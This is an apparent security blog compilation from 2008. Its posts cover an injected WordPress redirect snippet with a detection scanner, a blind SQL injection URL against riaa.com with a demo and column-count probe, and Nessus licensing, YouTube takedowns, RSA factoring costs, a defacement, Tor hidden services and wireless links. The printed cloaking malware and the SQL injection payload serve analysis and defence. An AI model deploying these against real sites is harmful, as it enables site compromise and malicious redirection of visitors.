Wordpress 2.5.0 and 2.5.1 vulnerable to attack

Thanks to co-author Brandon Palmen for the heads-up about a WordPress hack in progress. The attackers are using a few obfuscation tricks to inject code into WordPress installations through a recently announced vulnerability. More details in a well-written write-up here.

The code snippet, posted on a digitalpoint.com forum, uses base64 encoding to hide the redirect destination:


<?php
// Referrer substrings to match: the major search engines plus a few portals
$seref = array("google", "msn",
               "live", "altavista", "ask",
               "yahoo", "aol", "cnn",
               "weather", "alexa");

$ser = 0;
foreach ($seref as $ref) {
    // Flag the request if the HTTP Referer names one of the sites above
    if (strpos(strtolower($_SERVER['HTTP_REFERER']), $ref) !== false) {
        $ser = "1";
        break;
    }
}

// Only redirect search-engine arrivals that carry no cookies at all
if ($ser == "1" && sizeof($_COOKIE) == 0) {
    // "YW55cmVzdWx0cy5uZXQ=" decodes to "anyresults.net"
    header("Location:http://" . base64_decode("YW55cmVzdWx0cy5uZXQ=") . "/");
    exit;
}
?>

This code shows another trend we've noticed at stopbadware.org: the injected code only acts on requests that arrive from a search engine (here by substring-matching the Referer header) and that carry no cookies at all. The cookie test also excludes anyone holding a WordPress login cookie, so the site's own administrator never sees the redirect, and neither does a visitor who types the URL directly. We can only conclude this is to prevent (or delay) detection and maximize infection duration. The base64 literal decodes to anyresults.net; the encoding exists only so that a grep for the domain comes up empty.
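As an added example, not code from the original post or from stopbadware.org, here is a small Python scanner that hunts for this pattern across a WordPress install: it decodes every base64_decode("...") literal it finds in .php files and flags a file only when an obfuscated literal sits alongside a referer or cookie test and a Location: redirect, so ordinary base64 use is not reported. The two embedded PHP samples are constructed for the demonstration; scan_tree() takes whatever directory you point it at.

```python
import base64
import re
from pathlib import Path

# base64_decode("...") with a literal argument: the obfuscation seen in the injected snippet
B64_LITERAL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")

# Pieces of the cloaking pattern: referer test, cookie test, and a redirect header
INDICATORS = {
    "referer_check": re.compile(r"HTTP_REFERER"),
    "cookie_check": re.compile(r"(sizeof|count)\(\s*\$_COOKIE\s*\)"),
    "redirect": re.compile(r"header\(\s*['\"]Location:", re.IGNORECASE),
}


def decode_literals(src):
    """Return the decoded strings of every base64_decode("<literal>") call in src."""
    decoded = []
    for match in B64_LITERAL.finditer(src):
        try:
            raw = base64.b64decode(match.group(1), validate=True)
        except ValueError:  # binascii.Error is a subclass of ValueError
            continue
        decoded.append(raw.decode("utf-8", errors="replace"))
    return decoded


def scan_source(src):
    """Classify one PHP source text: which indicators fire and what the literals decode to."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(src)]
    decoded = decode_literals(src)
    # A redirect whose target is hidden in base64 and gated on the referer or on
    # cookies is the cloaking pattern; base64 on its own (embedded images etc.) is not.
    suspicious = "redirect" in hits and bool(decoded) and (
        "referer_check" in hits or "cookie_check" in hits
    )
    return {"indicators": hits, "decoded": decoded, "suspicious": suspicious}


def scan_tree(root):
    """Walk an install and return {path: result} for every suspicious .php file."""
    findings = {}
    for path in Path(root).rglob("*.php"):
        try:
            src = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        result = scan_source(src)
        if result["suspicious"]:
            findings[str(path)] = result
    return findings


# Constructed sample: a condensed copy of the injected snippet quoted above
INJECTED = '''<?php
$ser=0;
if(strpos(strtolower($_SERVER['HTTP_REFERER']),"google")!==false){$ser="1";}
if($ser=="1" && sizeof($_COOKIE)==0){
header("Location:http://" . base64_decode("YW55cmVzdWx0cy5uZXQ=") . "/");
exit;}
?>'''

# Constructed sample: legitimate base64 use with no redirect
BENIGN = '''<?php
$logo = base64_decode("aGVsbG8=");  // embedded data, nothing to do with redirects
echo strlen($logo);
?>'''

if __name__ == "__main__":
    for label, src in (("injected", INJECTED), ("benign", BENIGN)):
        print(label, scan_source(src))
```

Run it against wp-content/themes and wp-content/plugins first, since that is where injected code usually lands; anything it flags should be diffed against a clean copy of the theme or plugin rather than trusted on sight.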

Chinese hackers' political assault on the blogosphere

Disturbing news of a hacked blogger in China. This is not a simple drive-by download (DBD) setup involving iframes. This was a highly targeted and politically motivated attack. The attackers not only posted a personal picture of her with instructions for viewers to assault her on the street, but also managed to compromise her Skype account.

Tenable alters Nessus plug-in licensing. Still not Open

Dear Nessus Community,

On behalf of Tenable Network Security, we would like to thank you for making Tenable’s Nessus®
vulnerability scanner the most widely used scanner in the world. Over the last five years, we have seen
Nessus grow globally to over 5 million downloads and we have been there every step of the way. The core
Nessus engine is powered by our world-class vulnerability research content which includes over 20,000
plugins, enhanced features such as IPv6 scanning, free mailing lists, online search tools and free clients.
Nessus has become not only a popular tool for conducting security audits but we have extended its
capabilities to conduct agent-less patch audits and configuration audits, as well as locating sensitive data.
Looking forward, we plan to further increase functionality, such as SMBv2 support to better audit Windows
2008 and Windows Vista, and further expand our abilities to conduct even more comprehensive vulnerability
and configuration audits.

In the process, the Nessus scanning engine has been provided to our rapidly growing community as a free
download with research content licensed through two plugin subscriptions. Our Nessus users know these as
the “Registered Feed” and the “Direct Feed” subscriptions. These subscriptions have been available for over
three years and have been utilized by countless individuals, consultants, companies, governments and other
organizations.

We continually interact with the Nessus community and review our capabilities to ensure Nessus continues
to meet and exceed the needs of its users. Since creating and releasing the subscriptions, two distinct user
groups emerged. They are the home user and the commercial user. To better reflect the needs of our
community, we have decided to update our Subscription licensing policy and are announcing the planned
change (as outlined below and accompanied by a FAQ) that will go into effect on July 31st, 2008.

First, we will continue to enable all users to download Nessus for free.

Second, due to computers and personal networks having become ubiquitous in homes around the
world, Tenable will launch a “HomeFeed” with all Nessus vulnerability plugin updates for home users
at no charge and with no delay. We are excited to offer the latest vulnerability checks for
personal, non-commercial use and strongly encourage home users to audit their computers and
networks for the newest security flaws.

Finally, Tenable’s “Direct Feed” will be re-named to the “ProfessionalFeed” and the “Registered Feed”
will be discontinued. The ProfessionalFeed will entitle subscribers to the latest vulnerability and
patch audits, configuration and content audits and commercial support for their Nessus 3
installation. The ProfessionalFeed will serve as Tenable’s commercial subscription and will be
required for individuals and organizations that want to use Tenable’s Nessus plugins commercially.

The decision to alter the licensing policy is the result of significant deliberation and will benefit both home
users and commercial users. The change will ensure our ability to invest in the future roadmap for Nessus
and to expand our research, support and training capabilities to serve our growing community. We realize
this may affect some individuals, corporations and organizations that use the currently available “Registered
Feed” in production audits and commercial services. Because of this, Tenable is offering a 25 percent rebate
for the Direct Feed subscription service (normally available at $1200 per year), beginning May 14, 2008 until
July 31, 2008 only when purchased through Tenable’s e-commerce site.
Additionally, we understand that there are those in the Nessus community that serve broad social and
educational objectives and we want to make certain that qualified charitable and information security
teaching/training organizations have access to the ProfessionalFeed free of charge. To this end, Tenable will
provide ProfessionalFeed subscriptions to charity and teaching/training organizations at no cost for those
that qualify.
As always, Tenable will continue to perform the in-depth research, testing and development to keep Nessus
the leading vulnerability and network auditing tool available to both home and professional users.

excerpt directly from Tenable Network Security, Inc.

Anti-Scientology videos taken down en masse on YouTube

The other day I received an email about a new Anonymous vs. Scientology dispute on YouTube. The Enturbulation forum reported that Tory Christman, a very vocal critic of Scientology, had her YouTube account suspended. This time it looks as though Mark Bunker (Wise Beard Man) has had many of his videos taken down as Terms of Service violations. Roughly 90 of his videos appear to be down at this time. You can view these takedowns as we discover them at YouTomb.
[disclosure: I am an active team member of the YouTomb project]
[update: the Enturbulation forum has also confirmed this account suspension in the same thread, on page 21]

I’ve created a CSV of the videos affected here.
Because Wordpress won’t let me upload .CSV I have named the file .txt. Rename it to .CSV and use your favorite spreadsheet software to view it.

Given Mark Bunker's history, one has to wonder what Scientology told YouTube in order to have his account shut down. As one can see from the data collected, all the public is told is that there was a Terms of Service violation; we have no idea what those violations might be.

Cracking 1024 bit RSA keys

The next time someone raves about the advances of computing, ask them about this challenge. A paper by Adi Shamir and Eran Tromer, "On the Cost of Factoring RSA-1024" [pdf], works out the cost of a special-purpose sieving device (the TWIRL design) that could "break a 1024-bit RSA key in one year using a device whose cost is about $10M" (emphasis mine).
$10M is a sizable start-up cost, so this type of capability certainly isn't going to fall into the hands of most criminal organizations (narco lords in South America aside), but a defense agency could handle it without difficulty. It isn't difficult to imagine a message important enough to justify that effort. However, advances such as perfect forward secrecy make even these herculean efforts less effective: factoring a server's long-term key no longer recovers the session keys of past conversations. Courts have been dealing with the problem in a different way. Some realize they can't coerce a private key out of a defendant, while others attempt to force decryption with the threat of jail time. My question is how well Moore's law really fits here. Using the simple "half the price every year" version of the axiom, we can expect to factor a 1024-bit key for as little as $10k (for one year of work) ten years from now; with the more usual 18- to 24-month doubling period the figure lands nearer $100k to $300k, which is still well within the reach of a mid-sized adversary.

Local Irish bar… hacked

While doing some research for the SOURCEboston pub crawl I wandered over to the Tommy Doyle web page. Clearly not a page visited often or cared for much by the owners, since it has an anti-war defacement up stating:

Security :0 My test: 1

Who is ‘the real murder’ Bush? You or this baby?
[ - _ +]

Hacked BY Scientist/AYT

A haunting but beautiful Arabic song plays in the background. The source of the mp3 is http://dosyalar.semazen.net/muzic/Esma1.mp3, but I can not in good conscience hotlink to the song. If anyone knows the folks at TD's, they should be told so they can fix their server security, and they need to check the whole server rather than just restore the one page. The really odd part is that the Kendall page and the main page are unchanged; only the Harvard location page contains this message.

Here is a mirror of the page
tommy doyle pwned

RIAA webserver compromised

The following URL was found on a popular aggregation site:

http://riaa.com/news_room.php?resultpage=9&news_year_filter=2007%20UNION%20ALL%20SELECT%20BENCHMARK(100000000,MD5('asdf')),NULL,NULL,NULL,NULL%20--

Broken down into its component pieces, the actual SQL is easier to read:

UNION ALL SELECT
BENCHMARK(100000000,MD5('asdf'))
,NULL,NULL,NULL,NULL --

We can see that the URL parameter carries a MySQL expression that computes the MD5 of the string 'asdf' 100 million times. BENCHMARK() is the classic probe for blind SQL injection: the attacker doesn't need to see any output, because a response that takes seconds longer than usual confirms the injected SQL was executed. The UNION ALL SELECT padded with four NULLs shows the attacker had already matched the column count of the original query, and the trailing -- comments out whatever followed the parameter in the page's SQL. This very clear and simple vector allowed others to achieve content insertion and possibly even deletion. What is worse, a malicious person could easily have planted an iframe in the content to infect every visitor to the RIAA website. They are clearly not conducting code reviews on the RIAA website, since this type of SQL injection would be noticed by even the most novice of auditors. The Content Management System (CMS) used was known to be vulnerable, so patches were likely available.
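As an added example, not from the original post or the RIAA site, the following Python script reproduces the shape of that injection against an in-memory SQLite table: a constructed news table, the query built by string concatenation as the vulnerable page evidently did, and the same query with a bound parameter. BENCHMARK() is MySQL-specific, so the payload carries a marker string in its place; the column-count probe shows how the attacker would have arrived at the four NULLs. Table and column names are assumptions.

```python
import sqlite3

# The RIAA payload with the MySQL-only BENCHMARK(...) replaced by a marker
# string so it runs on SQLite; the UNION ALL / NULL padding / "--" shape is unchanged.
PAYLOAD = "2007 UNION ALL SELECT 'INJECTED',NULL,NULL,NULL,NULL --"


def make_db():
    """Constructed stand-in for the CMS news table (names are assumptions)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE news (id INTEGER, title TEXT, body TEXT, year INTEGER, author TEXT)"
    )
    conn.executemany(
        "INSERT INTO news VALUES (?, ?, ?, ?, ?)",
        [
            (1, "Press release A", "...", 2007, "staff"),
            (2, "Press release B", "...", 2006, "staff"),
        ],
    )
    return conn


def vulnerable_query(conn, year_filter):
    """The request parameter is spliced into the SQL text, as the vulnerable page did."""
    sql = "SELECT id, title, body, year, author FROM news WHERE year = " + year_filter
    return conn.execute(sql).fetchall()


def safe_query(conn, year_filter):
    """Same query with a bound parameter: the value is never parsed as SQL."""
    sql = "SELECT id, title, body, year, author FROM news WHERE year = ?"
    return conn.execute(sql, (year_filter,)).fetchall()


def probe_column_count(conn, max_cols=10):
    """How an attacker finds the NULL padding: add NULLs until UNION stops erroring."""
    for n in range(1, max_cols + 1):
        probe = "2007 UNION ALL SELECT " + ",".join(["NULL"] * n) + " --"
        try:
            vulnerable_query(conn, probe)
        except sqlite3.OperationalError:
            continue  # column count mismatch, try one more
        return n
    return None


if __name__ == "__main__":
    db = make_db()
    print("safe:      ", safe_query(db, PAYLOAD))        # no rows: the payload is just a value
    print("vulnerable:", vulnerable_query(db, PAYLOAD))  # the real row plus the injected one
    print("columns:   ", probe_column_count(db))         # 5
```

With the concatenated query the injected SELECT appears as an ordinary result row, which is exactly how an attacker turns a read-only news listing into a channel for content they control; with the bound parameter the whole payload is compared against the year column as a single value and matches nothing.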

Psiphon

As noted on several other blogs…
Psiphon is part of the CiviSec Project run by the Citizen Lab at the Munk Centre for International Studies at the University of Toronto. The CiviSec Project is funded by the Open Society Institute.

http://psiphon.civisec.org/

Tor

Tor is great if you are already encrypting your traffic. It isn't the best idea if you are doing a lot of cleartext activity: the exit node sees, and can alter, anything that isn't end-to-end encrypted, so Tor hides where you are connecting from but not what you send in the clear.

OSX Instructions here

The Tor Overview is worth reading through and I can see good uses for this type of tech for globe trotters who may need to bypass certain filters.

Some advanced tips:

If you want to forward multiple virtual ports for a single hidden service, just add more HiddenServicePort lines. If you want to run multiple hidden services from the same Tor client, just add another HiddenServiceDir line. All the following HiddenServicePort lines refer to this HiddenServiceDir line, until you add another HiddenServiceDir line. Tor writes each service's hostname (its .onion address) and private key into that HiddenServiceDir, so the directory must be readable only by the user Tor runs as:

HiddenServiceDir /usr/local/etc/tor/hidden_service/
HiddenServicePort 80 127.0.0.1:8080

HiddenServiceDir /usr/local/etc/tor/other_hidden_service/
HiddenServicePort 6667 127.0.0.1:6667
HiddenServicePort 22 127.0.0.1:22

Wireless Resources

Wireless Users Groups
bawug.org Bay Area Wireless Users Group
nycwireless.net NYC Wireless Group
personaltelco.net Personal Telco Project
frars.org.uk FRARS Wireless lan working group
bawia.org Boston Area Wireless Internet Alliance
GBA 802.11 Greater Boston Area 802.11 Wireless Database
DC-WiFi Initiative Public WiFi advocates in Washington DC
Seattle Wireless Seattle Wireless group

Wardriving Resources

wardriving.com Wardriving news portal
www.sicheres-funknetz.de Wireless security portal (German)
www.netagent.at Wardriving and Wireless site (German)